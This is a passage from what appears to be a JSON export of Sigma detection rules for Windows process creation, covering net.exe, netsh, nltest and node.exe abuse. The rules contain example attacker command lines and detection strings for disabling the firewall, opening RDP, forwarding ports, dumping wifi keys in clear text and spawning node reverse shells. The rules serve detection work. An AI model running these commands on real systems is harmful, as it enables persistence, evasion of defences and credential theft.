    "content": "title: New User Created Via Net.EXE\nid: cd219ff3-fa99-45d4-8380-a7d15116c6dc\nrelated:\n    - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c\n      type: similar\nstatus: test\ndescription: Identifies the creation of local users via the net.exe command.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md\nauthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community)\ndate: 2018-10-30\nmodified: 2023-02-21\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'user'\n            - 'add'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate user creation.\n    - Better use event IDs for user creation rather than command line rules.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml",
    "content": "title: New User Created Via Net.EXE With Never Expire Option\nid: b9f0e6f5-09b4-4358-bae4-08408705bd5c\nrelated:\n    - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc\n      type: derived\nstatus: test\ndescription: Detects creation of local users via the net.exe command with the option \"never expire\"\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2023-02-21\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'user'\n            - 'add'\n            - 'expires:never'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml",
    "content": "title: Suspicious Manipulation Of Default Accounts Via Net.EXE\nid: 5b768e71-86f2-4879-b448-81061cbae951\nstatus: test\ndescription: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc\nreferences:\n    - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html\n    - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/\n    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-01\nmodified: 2023-02-21\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_user_option:\n        CommandLine|contains: ' user '\n    selection_username:\n        CommandLine|contains:\n            # Note: We need to write the full account name for cases starting with 'admin' to avoid lookups only with the user flag\n            - ' Järjestelmänvalvoja ' # Finish\n            - ' Rendszergazda ' # Hungarian\n            - ' Администратор ' # Russian\n            - ' Administrateur ' # French\n            - ' Administrador ' # Portuguese (Brazil + Portugal) + Spanish\n            - ' Administratör ' # Swedish\n            - ' Administrator ' # English\n            - ' guest '\n            - ' DefaultAccount '\n            # The cases below are for when an attacker requests the net command via 'cmd /c....'\n            # First in double quotes\n            - ' \"Järjestelmänvalvoja\" ' # Finish\n            - ' \"Rendszergazda\" ' # Hungarian\n            - ' \"Администратор\" ' # Russian\n            - ' \"Administrateur\" ' # French\n            - ' \"Administrador\" ' # Portuguese (Brazil + Portugal) + Spanish\n            - ' \"Administratör\" ' # Swedish\n            - ' \"Administrator\" ' # English\n            - ' \"guest\" '\n            - ' \"DefaultAccount\" '\n            # Second in single quotes\n            - \" 'Järjestelmänvalvoja' \" # Finish\n            - \" 'Rendszergazda' \" # Hungarian\n            - \" 'Администратор' \" # Russian\n            - \" 'Administrateur' \" # French\n            - \" 'Administrador' \" # Portuguese (Brazil + Portugal) + Spanish\n            - \" 'Administratör' \" # Swedish\n            - \" 'Administrator' \" # English\n            - \" 'guest' \"\n            - \" 'DefaultAccount' \"\n    filter:\n        CommandLine|contains|all:\n            - 'guest'\n            - '/active no'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml",
    "content": "title: Share And Session Enumeration Using Net.EXE\nid: 62510e69-616b-4078-b371-847da438cc03\nstatus: stable\ndescription: Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nauthor: Endgame, JHasenbusch (ported for oscd.community)\ndate: 2018-10-30\nmodified: 2023-02-21\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains: 'view'\n    filter:\n        CommandLine|contains: '\\\\\\\\'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Legitimate use of net.exe utility by legitimate user\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml",
    "content": "title: New Firewall Rule Added Via Netsh.EXE\nid: cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c\nstatus: test\ndescription: Detects the addition of a new rule to the Windows firewall via netsh\nreferences:\n    - https://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf\nauthor: Markus Neis, Sander Wiebing\ndate: 2019-01-29\nmodified: 2023-02-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - attack.s0246\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' firewall '\n            - ' add '\n    filter_optional_dropbox:\n        CommandLine|contains:\n            - 'advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=?:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any'\n            - 'advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=?:\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administration activity\n    - Software installations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml",
    "content": "title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE\nid: a35f5a72-f347-4e36-8895-9869b0d5fc6d\nstatus: test\ndescription: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall\nreferences:\n    - https://www.virusradar.com/en/Win32_Kasidet.AD/description\n    - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100\nauthor: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2020-05-25\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        - CommandLine|contains|all:\n              - 'firewall'\n              - 'add'\n              - 'allowedprogram'\n        - CommandLine|contains|all:\n              - 'advfirewall'\n              - 'firewall'\n              - 'add'\n              - 'rule'\n              - 'action=allow'\n              - 'program='\n    selection_paths:\n        CommandLine|contains:\n            - ':\\$Recycle.bin\\'\n            - ':\\RECYCLER.BIN\\'\n            - ':\\RECYCLERS.BIN\\'\n            - ':\\SystemVolumeInformation\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Desktop\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\addins\\'\n            - ':\\Windows\\cursors\\'\n            - ':\\Windows\\debug\\'\n            - ':\\Windows\\drivers\\'\n            - ':\\Windows\\fonts\\'\n            - ':\\Windows\\help\\'\n            - ':\\Windows\\system32\\tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\Downloads\\'\n            - '\\Local Settings\\Temporary Internet Files\\'\n            - '\\Temporary Internet Files\\Content.Outlook\\'\n            - '%Public%\\'\n            - '%TEMP%'\n            - '%TMP%'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml",
    "content": "title: RDP Connection Allowed Via Netsh.EXE\nid: 01aeb693-138d-49d2-9403-c4f52d7d3d62\nstatus: test\ndescription: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware\nreferences:\n    - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/\nauthor: Sander Wiebing\ndate: 2020-05-23\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        # Example:\n        #   Old: netsh firewall add portopening TCP 3389 \"Open Port 3389\"\n        #   New: netsh advfirewall firewall add rule name= \"Open Port 3389\" dir=in action=allow protocol=TCP localport=3389\n        CommandLine|contains|all:\n            - 'firewall '\n            - 'add '\n            - 'tcp '\n            - '3389'\n        CommandLine|contains:\n            - 'portopening'\n            - 'allow'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_delete_rule.yml",
    "content": "title: Firewall Rule Deleted Via Netsh.EXE\nid: 1a5fefe6-734f-452e-a07d-fc1c35bce4b2\nstatus: test\ndescription: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh\nreferences:\n    - https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/\nauthor: frack113\ndate: 2022-08-14\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'firewall'\n            - 'delete '\n    filter_optional_dropbox:\n        ParentImage|endswith: '\\Dropbox.exe'\n        CommandLine|contains: 'name=Dropbox'\n    filter_optional_avast:\n        ParentImage|endswith: '\\instup.exe'\n        CommandLine|contains: 'advfirewall firewall delete rule name=\"Avast Antivirus Admin Client\"'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administration activity\n    - Software installations and removal\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml",
    "content": "title: Firewall Disabled via Netsh.EXE\nid: 57c4bf16-227f-4394-8ec7-1b745ee061c3\nstatus: test\ndescription: Detects netsh commands that turns off the Windows firewall\nreferences:\n    - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\n    - https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall\nauthor: Fatih Sirin\ndate: 2019-11-01\nmodified: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - attack.s0108\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli_1:\n        # Example: netsh firewall set opmode disable\n        CommandLine|contains|all:\n            - 'firewall'\n            - 'set'\n            - 'opmode'\n            - 'disable'\n    selection_cli_2:\n        # Example: netsh advfirewall set currentprofile state off\n        CommandLine|contains|all:\n            - 'advfirewall'\n            - 'set'\n            - 'state'\n            - 'off'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml",
    "content": "title: Netsh Allow Group Policy on Microsoft Defender Firewall\nid: 347906f3-e207-4d18-ae5b-a9403d6bcdef\nstatus: test\ndescription: Adversaries may modify system firewalls in order to bypass controls limiting network usage\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior\nauthor: frack113\ndate: 2022-01-09\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'advfirewall'\n            - 'firewall'\n            - 'set'\n            - 'rule'\n            - 'group='\n            - 'new'\n            - 'enable=Yes'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml",
    "content": "title: Firewall Configuration Discovery Via Netsh.EXE\nid: 0e4164da-94bc-450d-a7be-a4b176179f1f\nstatus: test\ndescription: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules\n    - https://ss64.com/nt/netsh.html\nauthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'\ndate: 2021-12-07\nmodified: 2025-10-18\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'netsh'\n            - 'show '\n            - 'firewall '\n        CommandLine|contains:\n            - 'config '\n            - 'state '\n            - 'rule '\n            - 'name=all'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml",
    "content": "title: Firewall Rule Update Via Netsh.EXE\nid: a70dcb37-3bee-453a-99df-d0c683151be6\nstatus: test\ndescription: Detects execution of netsh with the \"advfirewall\" and the \"set\" option in order to set new values for properties of a existing rule\nreferences:\n    - https://ss64.com/nt/netsh.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            # Example 1: netsh advfirewall firewall set rule \"group=\\\"Network Discovery\\\" \" new enable=Yes\"\n            # Example 2: netsh advfirewall firewall set rule \"group=\\\"File and Printer Sharing\\\" \" new enable=Yes\"\n            - ' firewall '\n            - ' set '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\n    - Software installations and removal\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml",
    "content": "title: Potential Persistence Via Netsh Helper DLL\nid: 56321594-9087-49d9-bf10-524fe8479452\nrelated:\n    - id: c90362e0-2df3-4e61-94fe-b37615814cb1\n      type: similar\n    - id: e7b18879-676e-4a0e-ae18-27039185a8e7\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md\n    - https://github.com/outflanknl/NetshHelperBeacon\n    - https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/\nauthor: Victor Sergeev, oscd.community\ndate: 2019-10-25\nmodified: 2023-11-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.007\n    - attack.s0108\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'netsh.exe'\n        - Image|endswith: '\\netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'add'\n            - 'helper'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml",
    "content": "title: New Network Trace Capture Started Via Netsh.EXE\nid: d3c3861d-c504-4c77-ba55-224ba82d0118\nstatus: test\ndescription: Detects the execution of netsh with the \"trace\" flag in order to start a network capture\nreferences:\n    - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/\n    - https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/\nauthor: Kutepov Anton, oscd.community\ndate: 2019-10-24\nmodified: 2023-02-13\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'trace'\n            - 'start'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml",
    "content": "title: New Port Forwarding Rule Added Via Netsh.EXE\nid: 322ed9ec-fcab-4f67-9a34-e7c6aef43614\nstatus: test\ndescription: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\n    - https://adepts.of0x.cc/netsh-portproxy-code/\n    - https://www.dfirnotes.net/portproxy_detection/\nauthor: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel\ndate: 2019-01-29\nmodified: 2023-09-01\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'interface'\n            - 'portproxy'\n            - 'add'\n            - 'v4tov4'\n    selection_cli_2:\n        CommandLine|contains|all:\n            # Example: netsh I p a v l=8001 listena=127.0.0.1 connectp=80 c=192.168.1.1\n            - 'i ' # interface\n            - 'p ' # portproxy\n            - 'a ' # add\n            - 'v ' # v4tov4\n    selection_cli_3:\n        CommandLine|contains|all:\n            - 'connectp'\n            - 'listena'\n            - 'c='\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate administration activity\n    - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml",
    "content": "title: RDP Port Forwarding Rule Added Via Netsh.EXE\nid: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63\nstatus: test\ndescription: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\nauthor: Florian Roth (Nextron Systems), oscd.community\ndate: 2019-01-29\nmodified: 2023-02-13\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' i'\n            - ' p'\n            - '=3389'\n            - ' c'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml",
    "content": "title: Harvesting Of Wifi Credentials Via Netsh.EXE\nid: 42b1a5b8-353f-4f10-b256-39de4467faff\nstatus: test\ndescription: Detect the harvesting of wifi credentials using netsh.exe\nreferences:\n    - https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/\nauthor: Andreas Hunkeler (@Karneades), oscd.community\ndate: 2020-04-20\nmodified: 2023-02-13\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'wlan'\n            - ' s'\n            - ' p'\n            - ' k'\n            - '=clear'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_nltest_execution.yml",
    "content": "title: Nltest.EXE Execution\nid: 903076ff-f442-475a-b667-4f246bcc203b\nrelated:\n    - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248\n      type: similar\n    - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1\n      type: obsolete\nstatus: test\ndescription: Detects nltest commands that can be used for information discovery\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm\nauthor: Arun Chauhan\ndate: 2023-02-03\ntags:\n    - attack.discovery\n    - attack.t1016\n    - attack.t1018\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\nltest.exe'\n        - OriginalFileName: 'nltestrk.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_nltest_recon.yml",
    "content": "title: Potential Recon Activity Via Nltest.EXE\nid: 5cc90652-4cbd-4241-aa3b-4b462fa5a248\nrelated:\n    - id: 410ad193-a728-4107-bc79-4419789fcbf8\n      type: similar\n    - id: 903076ff-f442-475a-b667-4f246bcc203b\n      type: similar\n    - id: 77815820-246c-47b8-9741-e0def3f57308\n      type: obsolete\nstatus: test\ndescription: Detects nltest commands that can be used for information discovery\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)\n    - https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\n    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n    - https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\n    - https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html\n    - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/\n    - https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest\nauthor: Craig Young, oscd.community, Georg Lauenstein\ndate: 2021-07-24\nmodified: 2023-12-15\ntags:\n    - attack.discovery\n    - attack.t1016\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_nltest:\n        - Image|endswith: '\\nltest.exe'\n        - OriginalFileName: 'nltestrk.exe'\n    selection_recon:\n        - CommandLine|contains|all:\n              - 'server'\n              - 'query'\n        - CommandLine|contains:\n              - '/user'\n              - 'all_trusts' # Flag for /domain_trusts\n              - 'dclist:'\n              - 'dnsgetdc:'\n              - 'domain_trusts'\n              - 'dsgetdc:'\n              - 'parentdomain'\n              - 'trusted_domains'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration use but user and host must be investigated\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_node_abuse.yml",
    "content": "title: Potential Arbitrary Code Execution Via Node.EXE\nid: 6640f31c-01ad-49b5-beb5-83498a5cd8bd\nstatus: test\ndescription: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return\n    - https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/\n    - https://nodejs.org/api/cli.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main:\n        Image|endswith: '\\node.exe'\n        CommandLine|contains:\n            - ' -e '\n            - ' --eval '\n    # Add more pattern of abuse as actions\n    selection_action_reverse_shell:\n        CommandLine|contains|all:\n            - '.exec('\n            - 'net.socket'\n            - '.connect'\n            - 'child_process'\n    condition: selection_main and 1 of selection_action_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml",
    "content": "title: Node Process Executions\nid: df1f26d3-bea7-4700-9ea2-ad3e990cf90e\nstatus: test\ndescription: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud\nreferences:\n    - https://twitter.com/mttaggart/status/1511804863293784064\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-04-06\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1127\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\Adobe Creative Cloud Experience\\libs\\node.exe'\n    filter:\n        CommandLine|contains: 'Adobe Creative Cloud Experience\\js' # Folder where Creative Cloud's JS resources are located\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_notepad_local_passwd_discovery.yml",
    "content": "title: Notepad Password Files Discovery\nid: 3b4e950b-a3ea-44d3-877e-432071990709\nstatus: experimental\ndescription: Detects the execution of Notepad to open a file that has the string \"password\" which may indicate unauthorized access to credentials or suspicious activity.\nreferences:\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\n    - https://intel.thedfirreport.com/eventReports/view/57  # Private Report\nauthor: 'The DFIR Report'\ntags:\n    - attack.discovery\n    - attack.t1083\ndate: 2025-02-21\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\explorer.exe'\n        Image|endswith: '\\notepad.exe'\n        CommandLine|endswith:\n        # Note: Commandline to contain a file with the string password and a specific extension\n            - 'password*.txt'\n            - 'password*.csv'\n            - 'password*.doc'\n            - 'password*.xls'\n    condition: selection\nfalsepositives:\n    - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml",
    "content": "title: Network Reconnaissance Activity\nid: e6313acd-208c-44fc-a0ff-db85d572e90e\nstatus: test\ndescription: Detects a set of suspicious network related commands often used in recon stages\nreferences:\n    - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-07\ntags:\n    - attack.discovery\n    - attack.t1087\n    - attack.t1082\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'nslookup'\n            - '_ldap._tcp.dc._msdcs.'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml",
